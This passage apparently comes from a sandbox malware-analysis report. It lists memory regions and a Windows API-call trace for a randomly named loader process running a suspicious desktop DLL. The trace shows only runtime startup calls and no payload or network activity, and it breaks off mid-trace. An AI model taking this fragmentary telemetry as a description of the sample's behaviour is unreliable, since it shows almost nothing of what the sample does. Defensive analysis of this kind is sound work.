"\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 963 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 964 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 965 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 966 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 967 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 968 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 969 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 970 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 971 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 972 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 973 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 974 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 975 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 976 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 977 start_va = 0x5e0000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 978 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 979 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 980 start_va = 0x5e0000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 981 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Thread: id = 44 os_tid = 0xb38 [0032.235] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa24 | out: lpSystemTimeAsFileTime=0x20fa24*(dwLowDateTime=0xe0efe6b0, dwHighDateTime=0x1d3dfba)) [0032.236] GetCurrentProcessId () returned 0xb34 [0032.236] GetCurrentThreadId () returned 0xb38 [0032.236] GetTickCount () returned 0x1737a [0032.236] QueryPerformanceCounter (in: lpPerformanceCount=0x20fa1c | out: lpPerformanceCount=0x20fa1c*=363104152) returned 1 [0032.236] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.236] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.236] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.236] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.237] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.237] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.237] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.237] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.237] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.237] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.238] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.238] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.238] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.238] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.238] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.238] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.239] GetCurrentThreadId () returned 0xb38 [0032.239] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"1\"" [0032.239] GetEnvironmentStringsW () returned 0x2978b8* [0032.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x6709f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.239] FreeEnvironmentStringsW (penv=0x2978b8) returned 1 [0032.239] GetStartupInfoA (in: lpStartupInfo=0x20f974 | out: lpStartupInfo=0x20f974*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.239] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.239] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.239] SetHandleCount (uNumber=0x20) returned 0x20 [0032.239] GetLastError () returned 0x0 [0032.239] SetLastError (dwErrCode=0x0) [0032.239] GetLastError () returned 0x0 [0032.239] SetLastError (dwErrCode=0x0) [0032.239] GetLastError () returned 0x0 [0032.239] SetLastError (dwErrCode=0x0) [0032.239] GetACP () returned 0x4e4 [0032.240] GetLastError () returned 0x0 [0032.240] SetLastError (dwErrCode=0x0) [0032.240] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.240] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f954 | out: lpCPInfo=0x20f954) returned 1 [0032.240] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f420 | out: lpCPInfo=0x20f420) returned 1 [0032.240] GetLastError () returned 0x0 [0032.240] SetLastError (dwErrCode=0x0) [0032.240] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x20f3b0 | out: lpCharType=0x20f3b0) returned 1 [0032.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f834, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f834, cbMultiByte=256, lpWideCharStr=0x20f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.240] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x20f434 | out: lpCharType=0x20f434) returned 1 [0032.240] GetLastError () returned 0x0 [0032.240] SetLastError (dwErrCode=0x0) [0032.240] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f834, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f834, cbMultiByte=256, lpWideCharStr=0x20f168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ坜矲狰Ā") returned 256 [0032.240] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ坜矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.240] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ坜矲狰Ā", cchSrc=256, lpDestStr=0x20ef58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.240] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x20f734, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\\\\¬õlù ", lpUsedDefaultChar=0x0) returned 256 [0032.240] GetLastError () returned 0x0 [0032.240] SetLastError (dwErrCode=0x0) [0032.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f834, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f834, cbMultiByte=256, lpWideCharStr=0x20f188, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ坜矲狰Ā") returned 256 [0032.240] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ坜矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.240] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ坜矲狰Ā", cchSrc=256, lpDestStr=0x20ef78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.240] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x20f634, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\\\\¬õlù ", lpUsedDefaultChar=0x0) returned 256 [0032.240] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.240] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.241] GetLastError () returned 0x0 [0032.241] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.242] GetLastError () returned 0x0 [0032.242] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] GetLastError () returned 0x0 [0032.243] SetLastError (dwErrCode=0x0) [0032.243] 